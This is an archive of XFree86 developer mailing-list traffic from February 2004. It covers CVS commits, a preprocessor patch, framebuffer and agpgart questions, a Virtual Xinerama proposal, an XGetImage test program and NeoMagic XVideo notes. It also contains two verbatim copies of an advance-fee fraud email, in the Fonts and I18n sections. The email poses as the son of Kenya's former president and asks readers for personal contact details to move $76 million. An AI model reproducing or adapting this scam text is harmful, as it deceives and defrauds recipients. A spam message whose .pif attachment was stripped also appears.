CVS Update: xc (branch: trunk)

2004-02-06 Thread Marc Aurele La France
CVSROOT:/home/x-cvs
Module name:xc
Changes by: [EMAIL PROTECTED]   04/02/06 09:15:36

Log message:
   790. Fix typo in bsd_mouse.c (Tyler Retzlaff).
   789. Fix off-by-one errors in the emulation of an ix86's BT, BTS, BTR and BTC
instructions (Marc La France).

Modified files:
  xc/extras/x86emu/src/x86emu/:
ops2.c 
  xc/programs/Xserver/hw/xfree86/:
CHANGELOG 
  xc/programs/Xserver/hw/xfree86/os-support/bsd/:
bsd_mouse.c 
  
  Revision  ChangesPath
  1.7   +29 -29xc/extras/x86emu/src/x86emu/ops2.c
  3.3131+4 -1  xc/programs/Xserver/hw/xfree86/CHANGELOG
  1.28  +2 -2  xc/programs/Xserver/hw/xfree86/os-support/bsd/bsd_mouse.c

___
Cvs-commit mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/cvs-commit


CVS Update: xc (branch: trunk)

2004-02-06 Thread David Dawes
CVSROOT:/home/x-cvs
Module name:xc
Changes by: [EMAIL PROTECTED]   04/02/06 20:33:08

Log message:
   792. Fix formatting of the XLookupString bytes that xev prints out (Bugzilla
#1153, Noah Levitt).

Modified files:
  xc/programs/xev/:
xev.c 
  
  Revision  ChangesPath
  1.14  +3 -3  xc/programs/xev/xev.c

___
Cvs-commit mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/cvs-commit


CVS Update: xc (branch: trunk)

2004-02-06 Thread David Dawes
CVSROOT:/home/x-cvs
Module name:xc
Changes by: [EMAIL PROTECTED]   04/02/06 20:37:18

Log message:
   793. Fix for the way the FreeType backend sets the
_ADOBE_POSTSCRIPT_FONTNAME property for Type1 fonts (Bugzilla #1123,
David Dawes, based on Roland Mainz, reported by David Capshaw).

Modified files:
  xc/lib/font/FreeType/:
ftfuncs.c 
  
  Revision  ChangesPath
  1.43  +11 -3 xc/lib/font/FreeType/ftfuncs.c

___
Cvs-commit mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/cvs-commit


CVS Update: xc (branch: trunk)

2004-02-06 Thread David Dawes
CVSROOT:/home/x-cvs
Module name:xc
Changes by: [EMAIL PROTECTED]   04/02/06 20:45:19

Log message:
  Remove XTTInLibXFont.  It doesn't work, and isn't required now that X-TT 2
  is part of the FreeType backend.

Modified files:
  xc/config/cf/:
X11.tmpl 
  xc/lib/font/:
Imakefile 
  xc/lib/font/X-TrueType/:
Imakefile 
  
  Revision  ChangesPath
  1.245 +1 -4  xc/config/cf/X11.tmpl
  3.38  +6 -13 xc/lib/font/Imakefile
  1.11  +1 -13 xc/lib/font/X-TrueType/Imakefile

___
Cvs-commit mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/cvs-commit


CVS Update: xc (branch: trunk)

2004-02-06 Thread David Dawes
CVSROOT:/home/x-cvs
Module name:xc
Changes by: [EMAIL PROTECTED]   04/02/06 20:46:53

Log message:
  updates

Modified files:
  xc/programs/Xserver/hw/xfree86/:
CHANGELOG 
  
  Revision  ChangesPath
  3.3132+8 -1  xc/programs/Xserver/hw/xfree86/CHANGELOG

___
Cvs-commit mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/cvs-commit


Re: does XFree86 need kernel framebuffer support?

2004-02-06 Thread Suresh Chandra Mannava
Dear Sir,

Thanks for your valuable information.

 --- Andrew C Aitchison [EMAIL PROTECTED]
wrote: 

 XFree86 does not in general need kernel framebuffer
 support for
 hardware which is supported by an XFree86 driver, as
 it has its own 
 framebuffer interface.

This almost solves our problem because our kernel have
no support for DRI or framebuffer.

 
 There are two cases where XFree86 does need kernel
 support.
 * Chipsets like the i810/i815/i835/... family have
 no framebuffer memory
 but use main system memory for the framebuffer. This
 requires agpgart 
 support from the kernel.

does agpgard is specificaly for AGP? or can we use it
for PCI?

I need to check whether our integrated PCI-ATI Rage is
having its own memory or sharing system memory. 
 
 The XFree86 mach64 driver does not use kernel
 support, 
 There is an XFree86 driver (fbdev IIRC) which uses
 kernel framebuffer 
 support, and some XFree86 drivers can work with a
 kernel framebuffer

We are going to use Mach64 server and as of now we are
not interested in DRI.
Once we successfuly port Xfree86 to our new platform
with basic server then we can concentrate on other
server implementations.


Thanks  Regards,
Suresh.



=
---
Suresh Chandra Mannava.
Research Scholar, V I T, India.
Abacus, X  GNOME porting
Cornet Tech India
mannavaatvit.ac.in


Yahoo! India Mobile: Download the latest polyphonic ringtones.
Go to http://in.mobile.yahoo.com
___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


bsd_mouse.c - small patch

2004-02-06 Thread Tyler Retzlaff
Don't place tokens after #endif preprocessor directive.

Index: bsd_mouse.c
===
RCS file:
/cvs/xc/programs/Xserver/hw/xfree86/os-support/bsd/bsd_mouse.c,v
retrieving revision 1.27
diff -u -p -r1.27 bsd_mouse.c
--- bsd_mouse.c 17 Jan 2004 15:20:05 -  1.27
+++ bsd_mouse.c 6 Feb 2004 06:55:48 -
@@ -378,7 +378,7 @@ FindDevice(InputInfoPtr pInfo, const cha
 }
 return *pdev;
 }
-#endif (__OpenBSD__)
+#endif /* (__OpenBSD__) */
 
 #ifdef WSCONS_SUPPORT
 #define NUMEVENTS 64


Thanks

-- 

Tyler R. Retzlaff [EMAIL PROTECTED] http://www.NetBSD.org
___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


Virtual Xinerama

2004-02-06 Thread Jan Dittmer
Hello,

I recently aquired a second video card, so that I now have a triple 
display. I'm using a Nvidia card (with the binary drivers) in TwinView 
Mode to drive the first two displays and a Ati card for the third 
display. What really annoys me is, that as as soon as you enable 
TwinView together with a second card, the two displays are just seen as 
one screen and so every window manager only 'sees' two screens. So 
maximized windows etc. always strech over (at least) two displays.
As I don't think Nvidia will be fixing this anytime soon and I think 
this could probably useful elsewhere (i.e. dividing your display into 
two screens so that window always are maximized to half the window, 
...), I'm wanting to implement a kind of virtual xinerama support.
I've thought about different ways of implementing this. The easiest 
solution I can see so far is to just extend the screen definitions in my 
ServerLayout like the following example:

Section ServerLayout
...
Screen  0 NvScreen Geometry 1280 1024 0 0
Screen  1 NvScreen Geometry 1280 1024 1280 0 RightOf 0
Screen  2 AtiScreen0 RightOf 1
Of course RightOf, LeftOf, etc. would have to be made to work with 
screen-nums and screen-ids. Also checks for non overlapping of areas 
would have to be done. And only dividing of hole screens will be 
supported, no funny part of this and part of that screen.
So, what do you think of the general idea? Is this just totally bogus or 
may this be useful? Especially, are their other ways (other than hacking 
every wm out there) to do this better/cleaner/faster?

Thanks for any comments, suggestions and hints,

Jan

ps: I already started hacking on this. Seems like I've to dig quite deep 
into the xinerama layer. :-)


pgp0.pgp
Description: PGP signature


Re: Virtual Xinerama

2004-02-06 Thread Jan Dittmer
Jan Dittmer wrote:
ps: I already started hacking on this. Seems like I've to dig quite deep 
into the xinerama layer. :-)
Okay, after looking into this, I think what I really just want to do is 
to fake the reply of PanoramiX{GetScreenCount,GetScreenSize,}, 
XineramaQueryScreens. Emulatins multiple screens, like first thought, 
gets far too complex. Are there any other places window managers get 
there screen information from in xinerama mode other than those 3?

Thanks,

Jan



pgp0.pgp
Description: PGP signature


Re: hi

2004-02-06 Thread o2shop
  -  The following is an automated response
  -  to your message generated on behalf of [EMAIL PROTECTED]



Dear O2 Customer, 
 
Please note that this is an unmonitored email account and we will not be able to 
respond to your query.  If you have a query about your service please visit 
www.o2.co.uk/help or email us at mailto:[EMAIL PROTECTED] where it will receive our 
attention.
 
Regards,
 
O2 Customer Care 

This communication is from O2 (Online) Limited. Registered office: Wellington Street, 
Slough, Berkshire, SL1 1YP. Registered number: 1906156. Business office: The Broadway, 
Hammersmith, London W6 9DL.
___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


Re: Manufacturers who fully disclosed specifications for agp cards?

2004-02-06 Thread Alexander Stohr
- Original Message - 
From: netpython [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Wednesday, February 04, 2004 9:38 AM
Subject: *** GMX Spamverdacht *** Re: *** GMX Spamverdacht *** Re:
Manufacturers who fully disclosed specifications for agp cards?


[...]
 (reverse engineering)
 Are there any good tools to do that under linux ?

there are a few dis-assemblers and debuggers around for Linux,
but the most promising approach to my understanding is the
emulation approach. there are projects which do make run
e.g. windows printer drivers on Linux via emulation (e.g. Wine),
other driver models will follow that soon and then you should
have full abilities on intercepting nearly anything what goes on.
lets consider even the newly announced coLinux (@sf.net)
approach as some basic approach for an emulation platform.

-Alex.

___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


Re: Virtual Xinerama

2004-02-06 Thread Alex Deucher
--- Jan Dittmer [EMAIL PROTECTED] wrote:
 Hello,
 
 I recently aquired a second video card, so that I now have a triple 
 display. I'm using a Nvidia card (with the binary drivers) in
 TwinView 
 Mode to drive the first two displays and a Ati card for the third 
 display. What really annoys me is, that as as soon as you enable 
 TwinView together with a second card, the two displays are just seen
 as 
 one screen and so every window manager only 'sees' two screens. So 
 maximized windows etc. always strech over (at least) two displays.
 As I don't think Nvidia will be fixing this anytime soon and I think 
 this could probably useful elsewhere (i.e. dividing your display into
 
 two screens so that window always are maximized to half the window, 
 ...), I'm wanting to implement a kind of virtual xinerama support.
 I've thought about different ways of implementing this. The easiest 
 solution I can see so far is to just extend the screen definitions in
 my 
 ServerLayout like the following example:
 
 Section ServerLayout
 ...
  Screen  0 NvScreen Geometry 1280 1024 0 0
   Screen  1 NvScreen Geometry 1280 1024 1280 0 RightOf 0
  Screen  2 AtiScreen0 RightOf 1
 
 Of course RightOf, LeftOf, etc. would have to be made to work with 
 screen-nums and screen-ids. Also checks for non overlapping of areas 
 would have to be done. And only dividing of hole screens will be 
 supported, no funny part of this and part of that screen.
 So, what do you think of the general idea? Is this just totally bogus
 or 
 may this be useful? Especially, are their other ways (other than
 hacking 
 every wm out there) to do this better/cleaner/faster?
 
 Thanks for any comments, suggestions and hints,

Drivers that implement their own xinerama extension are not compatible
with the official xinerama extension (It's not that they are
incompatiable, rather you can only have one xinerama extension
registered at a time).  right now you can only have one or the other. 
Torrey Lyons mentioned extending the xinerama extension at one point to
better accomodate things like merged framebuffer modes and other
windowing systems that provide their own multi-mon API such as Apple. 
I don't know that anyone has really done anything on this at the moment
though.  Take a look at the sis driver or the radeon driver in DRI cvs
or the pseudo-xinerama stuff in the quartz code for an idea of how this
should work for driver based xinerama extensions. Ideally the official
extension would be extended to handle both cases.  If you come up with
a patch, please post!

Alex

 
 Jan
 
 ps: I already started hacking on this. Seems like I've to dig quite
 deep 
 into the xinerama layer. :-)
 

 ATTACHMENT part 2 application/pgp-signature 



__
Do you Yahoo!?
Yahoo! Finance: Get your refund fast by filing online.
http://taxes.yahoo.com/filing.html
___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


Re: does XFree86 need kernel framebuffer support?

2004-02-06 Thread Andrew C Aitchison
On Fri, 6 Feb 2004, [iso-8859-1] Suresh Chandra Mannava wrote:

  There are two cases where XFree86 does need kernel
  support.
  * Chipsets like the i810/i815/i835/... family have
  no framebuffer memory
  but use main system memory for the framebuffer. This
  requires agpgart 
  support from the kernel.
 
 does agpgard is specificaly for AGP? or can we use it
 for PCI?

I've never used it, but I've seen references to pcigart,
which provides (some of) the features of the agpgart kernel
module for PCI devices.
After a quite google, I'm not sure whether it is actually a kernel
module, or part of the Mach64 DRI project:
  http://www.ussg.iu.edu/hypermail/linux/kernel/0102.1/0959.html
suggests that it may come with the DRI, but 
  http://mail-index.netbsd.org/tech-x11/2003/03/19/0006.html
suggests that it may come with the OS kernel.
(The first is quite old, but sugegsts that at the time pcigart
may not have had support for the Mach64).

My Mach64 is about 5 years old, and I've never needed a kernel
module for it, but I know that some of the later, more integrated,
versions were somewhat different.

As Tim Roberts says, even with system memory, you may not
need the gart functions, if the BIOS allocates enough memory
to the graphics unit. Since you are on a custom platform
that may or may not help you.

-- 
Andrew C. Aitchison Cambridge
[EMAIL PROTECTED]


___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


Re: bsd_mouse.c - small patch

2004-02-06 Thread Marc Aurele La France
On Fri, 6 Feb 2004, Tyler Retzlaff wrote:

 Don't place tokens after #endif preprocessor directive.

 Index: bsd_mouse.c
 ===
 RCS file:
 /cvs/xc/programs/Xserver/hw/xfree86/os-support/bsd/bsd_mouse.c,v
 retrieving revision 1.27
 diff -u -p -r1.27 bsd_mouse.c
 --- bsd_mouse.c 17 Jan 2004 15:20:05 -  1.27
 +++ bsd_mouse.c 6 Feb 2004 06:55:48 -
 @@ -378,7 +378,7 @@ FindDevice(InputInfoPtr pInfo, const cha
  }
  return *pdev;
  }
 -#endif (__OpenBSD__)
 +#endif /* (__OpenBSD__) */

  #ifdef WSCONS_SUPPORT
  #define NUMEVENTS 64

 Thanks

Done.  Thanks for the patch.

Marc.

+--+---+
|  Marc Aurele La France   |  work:   1-780-492-9310   |
|  Computing and Network Services  |  fax:1-780-492-1729   |
|  352 General Services Building   |  email:  [EMAIL PROTECTED]  |
|  University of Alberta   +---+
|  Edmonton, Alberta   |   |
|  T6G 2H1 | Standard disclaimers apply|
|  CANADA  |   |
+--+---+
XFree86 developer and VP.  ATI driver and X server internals.

___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


Re: does XFree86 need kernel framebuffer support?

2004-02-06 Thread Tim Roberts
Sergey Babkin wrote:

Tim Roberts wrote:
 

Andrew C Aitchison wrote:
   

There are two cases where XFree86 does need kernel support.
* Chipsets like the i810/i815/i835/... family have no framebuffer memory
but use main system memory for the framebuffer. This requires agpgart
support from the kernel.
 

This doesn't actually REQUIRE agpgart support from the kernel unless
you're doing bus mastering.  The ProSavages are UMA chips, with their
frame buffers in main memory, and as long as the BIOS has done the
proper division of memory at boot time, that's all it needs.
   

Many of the cards in the i810 family have only a very limited
amount of video memory on the card. So if you want to get anything over
800x600 on them, you need agpgart. On some of them the i810
driver won't start even in 800x600 mode, so VESA is the only option.
 

I was about to express my utter confusion at these comments, since in 
fact the i810 family (just like the ProSavages and other UMA solutions) 
has exactly zero megabytes on-chip video memory, but after doing some 
reading, I think I understand now.

The issue here, if I understand it, is that the BIOS on i810 systems is 
utterly brain-dead.  It will not allocate more than 1 MB of system RAM 
to the i810.  Thus, if you want more than 1024x768x8 or 800x600x16, you 
do, in fact, need agpgart support to remap the addresses.

This is NOT the case for ProSavage chips, nor for any of the other UMA 
chips I've encountered (like SiS).  In those cases, the BIOS carves up 
the system memory, and is able to allocate 8MB or 16MB or more to the 
graphics chip.  In that case, agpgart is not necessary.

So, I guess I learned something today.

--
- Tim Roberts, [EMAIL PROTECTED]
 Providenza  Boekelheide, Inc.
___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


I830M Second display enabling (Intel datasheet)

2004-02-06 Thread Jukka Alasalmi
Not sure if this helps at all, but there is mentioned something
about the enabling of the secondary video device on I830M
chipset. The datasheet is available at following address:
ftp://download.intel.com/design/chipsets/datashts/29833803.pdf

On the page 81, this is said about the GCC1-GMCH Control Register #1
Device #0:

Address Offset 52-53h,
bit 3:  Device #2 Disable - When set to 1 this bit disables
Device #2 and all associated spaces (Default value = 0)
bit 2:  Device #2 Function 1 Enable - When set to 1, enables the
second function within Device #2 (Default Value = 0).

It is said that these I/O mapped registers reside in the CPU I/O
addres space - the configuration address (CONFIG_ADDRESS) and the
configuration data (CONFIG_DATA) register. The configuration address
register enables/disables the configuration space and determines what
portion of configuration space is visible through the configuration
data window.

There's also information about the CONFIG_ADDRESS and usage of it,
starting at page 65. But I guess there's no reason for me to copy
it all here, as it is available in the mentioned url... :-)

Well, I haven't ever programmed any hardware-related stuff, and
all I can do is hope this information might be for some use..

___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


Multiple sessions accessed simultaneously

2004-02-06 Thread Andrew Bevitt
Hello,

I was just trying to get a feel for what people are looking at doing (ie plans 
etc..) in regards to having a X session running on more than one VT, on 
seperate monitors, that can be accessed by two different people 
simultaneously.

This would ovbiously require multiple input devices, two mice and keyboards.

Problem as I see it from the vanilla source tree is that no two VT's can be 
active simultaneously, and that device binding/exclusion for input on that VT 
is not supported. After all it would be a tad hard to work on a system when 
somewhen else move another mouse and your cursor moved with it :)

Thanks
Andrew Bevitt
___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


Re: does XFree86 need kernel framebuffer support?

2004-02-06 Thread Michel Dänzer
On Fri, 2004-02-06 at 10:30, Andrew C Aitchison wrote:
 On Fri, 6 Feb 2004, [iso-8859-1] Suresh Chandra Mannava wrote:
 
  does agpgard is specificaly for AGP? 

Yes.

  or can we use it for PCI?
 
 I've never used it, but I've seen references to pcigart,
 which provides (some of) the features of the agpgart kernel
 module for PCI devices.
 After a quite google, I'm not sure whether it is actually a kernel
 module, or part of the Mach64 DRI project:
   http://www.ussg.iu.edu/hypermail/linux/kernel/0102.1/0959.html
 suggests that it may come with the DRI, but 
   http://mail-index.netbsd.org/tech-x11/2003/03/19/0006.html
 suggests that it may come with the OS kernel.
 (The first is quite old, but sugegsts that at the time pcigart
 may not have had support for the Mach64).

As the first post says, PCI GART is a feature of ATI graphics chips;
AFAIK it's only provided by Rage128 and later.


-- 
Earthling Michel Dnzer  | Debian (powerpc), X and DRI developer
Libre software enthusiast|   http://svcs.affero.net/rm.php?r=daenzer

___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


XGetImage and Pixmap/Xvfb

2004-02-06 Thread Carl Nygard

I'm having problems grabbing images from XPixmap objects, whether
created on a visible Display or on a Xvfb display.  Specifically, I'm
drawing a fill which is stippled.  If the Drawable is a visible window,
XGetImage works fine.  When the Drawable is XPixmap, the filled area is
solid.

I tried to boil this down to some simple X test program, and I can't
even get that to capture an image from the pixmap on the normal display,
I get BadWindow errors.  I can however, use identical code and capture
from a visible window, and things work fine.

man pages and Xlib Programming Manual offer no help (that I can find).

I've tried this on my laptop (16bit depth) and my desktop (24bit).  Both
give the same errors.  Can anyone provide some clues?

g++ -o test test.cxx -L/usr/X11R6/lib -lXm -lXt -lx
./test
Creating visible window
Realizing widget
Creating Window
Creating DrawingArea
Getting Display
Allocating GC2
DefaultDepth: 16
Clearing Window1
Getting pixels
Allocating GC
Set foreground
Clearing Window
Allocating fill pixmap2
Setting fill pixmap
Drawing rectangle
Flushing
Done drawing
Capturing image 3c00014
X Error of failed request:  BadWindow (invalid Window parameter)
  Major opcode of failed request:  61 (X_ClearArea)
  Resource id in failed request:  0x3c00014
  Serial number of failed request:  154
  Current serial number in output stream:  164

#define's at top choose whether XImage is captured from Pixmap or
visible window.

Hope this is clear...





#define VIS 1
#define PIXMAP 1
#include stdio.h
#include stdlib.h
#include unistd.h
#include X11/Xlib.h
#include X11/Xutil.h
#include Xm/Xm.h

#if VIS
#include Xm/Form.h
#include Xm/DrawingA.h
#endif


GC CreateGC(Display* dsp, Window win)
{
int screen = DefaultScreen(dsp);

XGCValues   values;

values.function = GXcopy;
values.plane_mask   = AllPlanes;
values.line_width   = 0;
values.line_style   = LineSolid;
values.cap_style= CapButt;
values.fill_style   = FillSolid;
values.join_style   = JoinBevel;
values.subwindow_mode   = ClipByChildren;
values.graphics_exposures   = False;
values.clip_x_origin= 0;
values.clip_y_origin= 0;
values.clip_mask= None;
values.foreground   = WhitePixel(dsp, screen);
values.background   = BlackPixel(dsp, screen);

values.join_style   = JoinRound;

GC gc = XCreateGC(dsp, win,
  GCFunction|GCPlaneMask|GCLineWidth|
  GCLineStyle|GCCapStyle|
  GCFillStyle|GCJoinStyle|GCForeground|
  GCBackground|GCSubwindowMode|
  GCGraphicsExposures|GCClipXOrigin|
  GCClipYOrigin|GCClipMask,
  values);
if (gc == None) {
printf(Unable to get GC\n);
exit(-1);
}

return gc;
}

void SetFillStipple(Display* dsp, Window win, GC gc)
{
unsigned char opaque_bits[] = {
0x55, 0x50, 0xa0, 0xaa, 0x50, 0x55, 0xaa, 0xa0, 0x55, 0x50, 0xaa, 0xa0,
0x55, 0x50, 0xa0, 0xaa, 0x50, 0x55, 0xaa, 0xa0, 0x55, 0x50, 0xaa, 0xa0,
0x55, 0x50, 0xa0, 0xaa, 0x50, 0x55, 0xaa, 0xaa};

Pixmap fillPix = XCreatePixmapFromBitmapData(dsp, win,
 (char *)opaque_bits, 
 16, 16, 
 1, 0, 1);

printf(Setting fill pixmap\n);
XSetFillStyle(dsp, gc, FillStippled);
XSetStipple(dsp, gc, fillPix);
XFreePixmap(dsp, fillPix);
}

XImage* Capture(Display* dsp, Window win)
{
XImage* ximage = XGetImage(dsp, win, 
   0, 0, 800, 800,
   (unsigned long)0x00ff, ZPixmap);
if(ximage)
printf(Captured image\n);
else{
printf(Unable to grab image\n);
exit(-1);
}
return ximage;
}

void DrawRectangle(Display* dsp, Window win, GC gc)
{
printf(Set foreground\n);
XSetForeground(dsp, gc, 0x00ff00);
XSetBackground(dsp, gc, 0xff);

printf(Clearing Window\n);
XClearWindow(dsp, win);

printf(Allocating fill pixmap2\n);
SetFillStipple(dsp, win, gc);

printf(Drawing rectangle\n);
XFillRectangle(dsp, win, gc, 350, 350, 100, 100);

printf(Flushing\n);
XFlush(dsp);

printf(Done drawing\n);
}

int main(int argc, char** argv)
{

const char* displayName = :0.0;

#if VIS
printf(Creating visible window\n);
XtAppContext context;
Widget Gwindow, Ggraf;
Widget topLevel = XtVaAppInitialize(context,
PG,
NULL,0,
argc,argv,
NULL,
XmNwidth,800,
 

XVideo seems to work on NeoMagic NM2097

2004-02-06 Thread Karl Oberjohn
Hello,

I have a Mitsubishi AMiTY CN2 notebook with a NeoMagic NM2097 (MagicGraph 
128ZV+) video chipset.  I was excited to see that XVideo support was added 
for NeoMagic chipsets in XFree86 version 4.3, but for the life of me, I could 
not get it to work.  (I did add the OverlayMem option to my XF86Config.)  
xvinfo just gave me the dreaded No adapers present.

I'm not much of a programmer, but I looked through the neomagic driver source 
code, and apparently the driver only activates a video overlay for chipsets 
NM2160 (MagicGraph 128XD) and newer.

So just for the heck of it, I added the following line to my XF86Config:

   Chipset neo2160

I started up X, ran xvinfo... and I got a nice list of all the video modes 
supported by the NeoMagic Video Engine!  Wow!  Could it be that simple?  I 
played an MPEG video in full-screen mode with XINE, and sure enough, video 
performance was significantly improved compared to the XShm output device.  I 
even moved another window on top of the video, and I could see parts of the 
video showing through the colors that matched the chromakey.

The only problem I had was the cursor turned into a scattered mess of dots 
instead of a nice arrow.  I noticed in XFree86.0.log that the neomagic driver 
detected 2 MB of video memory when in fact I only have 1152 kB.  So I added 
one more line to my XF86Config:

   VideoRam 1152

And that fixed the cursor.  All other functions seem to work fine.  I am 
running 800x600 @ 16 bpp.

The other warning I received in the log file was:
Can not reserve 829440 bytes for overlay. Resize to 218624 bytes.

But I'm still able to play full-screen videos.

Is there any reason the neomagic driver shouldn't activate the video overlay 
on a NM2097 chipset?  (Maybe it would work on even older chipsets?)  It would 
sure be a nice feature addition for the upcoming version 4.4...

Thanks for your support,

Karl O.
___
Devel mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/devel


[Fonts] Urgent please

2004-02-06 Thread gideon . rapmoi
 Goodday,
  
  I am Gideon Arap Moi, the son of The former
  president of Kenya
  Mr Daniel Arap Moi. I came to know you in the course
  of my search for a reliable And GOD fearing partner, and I
  decided to contact you, Because I believe you are
  reputable person and I feel You can help me
  and my mother over this confidential matter.
 
  I count on your integrity and honesty to be able to
  handle this
  
 Business. My father, Mr Arap Moi, was the former
  president of Kenya ,
  In East Africa, During his reign as the president ,
  he had so many 
 
  Monetary dealing with a lot of European companies in
  my country 
  
  And out side my country, and he uses these companies
  as a means 
  
  Of transferring funds to foreign accounts in Europe
  ,America and 
  
  Asia., all these funds where gotten from the sales
  of Gold and Diamonds,
  
  Amongst the companies he registered was GOLDENBERG
  COMPANY,
  
  Which he uses as front for funds deposit, he made a
  transfer of $76,000,000.
  
  (seventy six million American Dollars) to this
  company which never existed,
  the said company has since been declared bankruptcy
  and liquidate, and The said funds has been deposited with a security
  company in Europe where it is kept from for safekeeping.
 For more information you can click on this website: 
  
  (1) http://news.bbc.co.uk/2/hi/africa/3338023.stm
 or ,
 
  (2) http://news.bbc.co.uk/2/hi/africa/3025878.stm%
 
  And as the only child of my mother who is the 6th
  wife to my father
  
  the president, he has given to us as our own share,
  which is this funds
  that is with the security company in Europe. The
  money is kept in  trunk boxes and was registered as precious
  substances, thus there is
  nobody that knows that it is money that i s in the
  box. All the documents  with which the money was deposited is with us (my
  mother and I) I am looking for somebody that is capable and willing to
  travel to any part
  of  Europe to receive the two trunk boxes of money on
  behalf of my mother
 
  and I from the security company.
  
  We need a trust worthy and experience person that
  will help us to invest

  This money in your country and take us as one family
  and will also buy
   A house for us over there where we can live safely
  
 We are expecting to hear from you, please contact me
  on my Confidential email address: [EMAIL PROTECTED] 
 
  Thanks for your anticipated co-operation , please
  include your
  
 Telephone number and fax number in your reply.
  
  Best Regards
  
  Gideon Arap Moi
___
Fonts mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/fonts


Re: [I18n] French (AZERTY) + greek polytonic keyboard

2004-02-06 Thread 10 . 50
Kalemera,

   As Danilo already explained, what you want is relatively easy to
 accomplish, using -layout fr,el -variant ,polytonic or something.
 It's for situations like this that the new, single-group-only layouts
 were introduced in the first place (symbols/pc/*).

Okay

   Unless of course you would like to have the Greek letters as well 
in
 an AZERTY ordering, i.e. have ¶ëöá as the topmost, leftmost key. 
This
 would need a few additions inside pc/el, but if there's an interest
 for this, it can be done.

That precisely what I did. It was horrible to have the key 'A' mapped 
to ';' whereas 'Q' was mapped to alpha, etc. So I changed the 
mapping, and I took also advantage that an AZERTY keyboard has a lot 
of diacritics which can be directly mapped into polytonic greek 
(diaeresis, various accents, caret, cedilla for iota subscriptum...)

   Unless of course you would also like to have the non-letter symbols
 be the same as the French keyboard. This, too, is perfectly doable,
 although it requires slightly more work [0]. But until we have a 
clear
 picture of what it is exactly that non-Greek users (the French, in
 this case) of the polytonic keyboard really want, there's no point.

I don't claim that what I wrote would be ideal for all French people 
interested in polytonic greek. Yet, it is more intuitive for a French 
keyboard user than a mapping based on some unknown layout, which 
requires quite a significant time to get used to.

Beyond that, though I am not sure anymore, I vaguely remember that 
some dead keys of el, polytonic were inactive (like dead_ogonek, which 
produced nothing).

Evkalisto ! ;)

Vincent
___
I18n mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/i18n


[I18n] Urgent please

2004-02-06 Thread gideon . rapmoi
 Goodday,
  
  I am Gideon Arap Moi, the son of The former
  president of Kenya
  Mr Daniel Arap Moi. I came to know you in the course
  of my search for a reliable And GOD fearing partner, and I
  decided to contact you, Because I believe you are
  reputable person and I feel You can help me
  and my mother over this confidential matter.
 
  I count on your integrity and honesty to be able to
  handle this
  
 Business. My father, Mr Arap Moi, was the former
  president of Kenya ,
  In East Africa, During his reign as the president ,
  he had so many 
 
  Monetary dealing with a lot of European companies in
  my country 
  
  And out side my country, and he uses these companies
  as a means 
  
  Of transferring funds to foreign accounts in Europe
  ,America and 
  
  Asia., all these funds where gotten from the sales
  of Gold and Diamonds,
  
  Amongst the companies he registered was GOLDENBERG
  COMPANY,
  
  Which he uses as front for funds deposit, he made a
  transfer of $76,000,000.
  
  (seventy six million American Dollars) to this
  company which never existed,
  the said company has since been declared bankruptcy
  and liquidate, and The said funds has been deposited with a security
  company in Europe where it is kept from for safekeeping.
 For more information you can click on this website: 
  
  (1) http://news.bbc.co.uk/2/hi/africa/3338023.stm
 or ,
 
  (2) http://news.bbc.co.uk/2/hi/africa/3025878.stm%
 
  And as the only child of my mother who is the 6th
  wife to my father
  
  the president, he has given to us as our own share,
  which is this funds
  that is with the security company in Europe. The
  money is kept in  trunk boxes and was registered as precious
  substances, thus there is
  nobody that knows that it is money that i s in the
  box. All the documents  with which the money was deposited is with us (my
  mother and I) I am looking for somebody that is capable and willing to
  travel to any part
  of  Europe to receive the two trunk boxes of money on
  behalf of my mother
 
  and I from the security company.
  
  We need a trust worthy and experience person that
  will help us to invest

  This money in your country and take us as one family
  and will also buy
   A house for us over there where we can live safely
  
 We are expecting to hear from you, please contact me
  on my Confidential email address: [EMAIL PROTECTED] 
 
  Thanks for your anticipated co-operation , please
  include your
  
 Telephone number and fax number in your reply.
  
  Best Regards
  
  Gideon Arap Moi
___
I18n mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/i18n


[XFree86] HELLO

2004-02-06 Thread blr-mlmhub
test

[Filename: rlhrt.pif, Content-Type: application/octet-stream]
The attachment file in the message has been removed by eManager.


Re: [XFree86] nv driver Rotate option broken in 4.3.0 while works in 4.2.1

2004-02-06 Thread Alexey Nezhdanov
   6  2004 09:28 Mark Vojkovich (a):
 On Fri, 6 Feb 2004, Alexey Nezhdanov wrote:
  Mark Vojkovich wrote:
 Rotate options in all drivers were broken by the RandR extension.
  You need to disable RandR with:
  
Option RandR 0
  
  in the Section ServerFlags
  
  
 Mark.
 
  Thanks. I will try it today.
 
  Then another question: is there any method to use xrandr to rotate
  screen. I've tried it with any grapchic adapter that was in my machine
  but it always says:
  Possible rotations: normal.

xrandr rotation was never implemented in XFree86.  Only the
 resize was implemented.

Thanks again. 
I've sucessfully upgraded to debian experimental Xfree86 4.3.0-pre1v5 and 
using it well now.

P.S. Here is a lovely place but too much volume for me. Unsubscribing now. Bye 
guys.

-- 
Respectfully
Alexey Nezhdanov




___
XFree86 mailing list
